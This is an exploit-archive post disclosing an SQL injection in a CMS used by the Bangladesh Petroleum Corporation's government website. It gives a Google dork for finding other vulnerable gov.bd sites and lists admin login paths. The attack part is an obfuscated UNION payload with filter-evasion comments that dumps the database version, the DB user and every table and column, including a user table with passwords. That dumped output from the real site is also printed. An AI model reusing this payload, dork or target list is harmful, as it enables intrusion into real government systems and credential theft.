facebook facebook twitter rss

Bangladesh Government Petroleum Corporation CorporateitLTD SQL Injection Vulnerability

Author: KingSkrupellos , Published: 10-10-2018
# Exploit Title : Bangladesh Government Petroleum Corporation CorporateitLTD SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 10/10/2018
# Vendor Homepage : bpc.gov.bd ~ corporateitltd.com ~ citl.com.bd
# Google Dork : intext:''Powered by CORPORATE IT LIMITED'' site:gov.bd
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Admin Panel Login Path :

/admin/login.php
/admin/index.php
/admin/
uscentral22.myserverhosts.com:2096

# SQL Injection Exploit :

/contactus.php?id=[SQL Injection]

/gallery.php?id=[SQL Injection]

# SQL Injection Exploit Payload =>

/contactus.php?id=17'+and+false+/*!50000UNION*/SELECT+1,2,CoNCat%0A
(0x3c2f7469746c653e3c626f64793e3c62723e3c666f6e7420636f6c6f723d5265642073697a653d333e496e6a33637433642
04279205a656e3c62723e56657273696f6e203a20,version(),0x3c62723e557365722829203a20,user(),0x3c62723e4462617
365203a20,dATAbASe(),(/*!12345sELecT*/(@)/*!50000from*/(/*!12345sELecT*/(@:%3D0x00),(/*!12345sELecT*/
(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)/*!50000where*/(`TAblE_sCHemA`%3DDatAbAsE/*data*/())and
(@)in(@:%3DCoNCat%0A(@,0x3c62723e5461626c6520466f756e64203a20,/*!50000TaBLe_nAMe*/,0x3a3a,/*!
50000column_name*/))))a)),4,5,6,7--+

# Exploit Payload Result Here [ Proof of Concept ] => archive.is/6fOG1

# The Result =>

Version : 5.5.51-38.2
User() : bpcadmin_admin@localhost
Dbase : bpcadmin_bpc
Table Found : tbl_Log::UserName
Table Found : tbl_Log::LogInTime
Table Found : tbl_Log::QueryString
Table Found : tbl_album::AlbumId
Table Found : tbl_album::AlbumName
Table Found : tbl_annual_performance_agreement::id
Table Found : tbl_annual_performance_agreement::title
Table Found : tbl_annual_performance_agreement::details
Table Found : tbl_annual_performance_agreement::date
Table Found : tbl_annual_performance_agreement::path
Table Found : tbl_annual_report::id
Table Found : tbl_annual_report::title
Table Found : tbl_annual_report::details
Table Found : tbl_annual_report::date
Table Found : tbl_annual_report::path
Table Found : tbl_authcontent::AuthContentId
Table Found : tbl_authcontent::AuthContentTitle
Table Found : tbl_authcontent::AuthContentName
Table Found : tbl_authcontent::AuthContentDetails
Table Found : tbl_category::id
Table Found : tbl_category::name
Table Found : tbl_circular_n_policy::id
Table Found : tbl_circular_n_policy::title
Table Found : tbl_circular_n_policy::details
Table Found : tbl_circular_n_policy::date
Table Found : tbl_circular_n_policy::path
Table Found : tbl_content::id
Table Found : tbl_content::pageName
Table Found : tbl_content::pageTitle
Table Found : tbl_content::pageContent
Table Found : tbl_content::category_id
Table Found : tbl_content::filepath
Table Found : tbl_content::dtime
Table Found : tbl_current_vacancies::id
Table Found : tbl_current_vacancies::title
Table Found : tbl_current_vacancies::details
Table Found : tbl_current_vacancies::date
Table Found : tbl_current_vacancies::path
Table Found : tbl_images::ImageId
Table Found : tbl_images::ImageTitle
Table Found : tbl_images::ImageDescription
Table Found : tbl_images::ImagePath
Table Found : tbl_images::AlbumId
Table Found : tbl_menu::id
Table Found : tbl_menu::name
Table Found : tbl_menu::category_id
Table Found : tbl_news::id
Table Found : tbl_news::title
Table Found : tbl_news::date
Table Found : tbl_news::details
Table Found : tbl_news::path
Table Found : tbl_notice::id
Table Found : tbl_notice::title
Table Found : tbl_notice::details
Table Found : tbl_notice::doc
Table Found : tbl_notice::publish_date
Table Found : tbl_notice::notice_type
Table Found : tbl_user::id
Table Found : tbl_user::username
Table Found : tbl_user::password
Table Found : tbl_user::UserType
Table Found : tbl_video::AlbumId
Table Found : tbl_video::albumDate
Table Found : tbl_video::albumTitle
Table Found : tbl_video::AlbumUrlCode

#################################################################################################

# Example Vulnerable Site =>

Bangladesh Government Petroleum Corporation is vulnerable for SQL Injection.

bpc.gov.bd/contactus.php?id=1' [ Proof of Concept for SQL Inj ] => archive.is/PlhBP

# SQL Database Error =>

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version

for the right syntax to use near '' at line 3

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :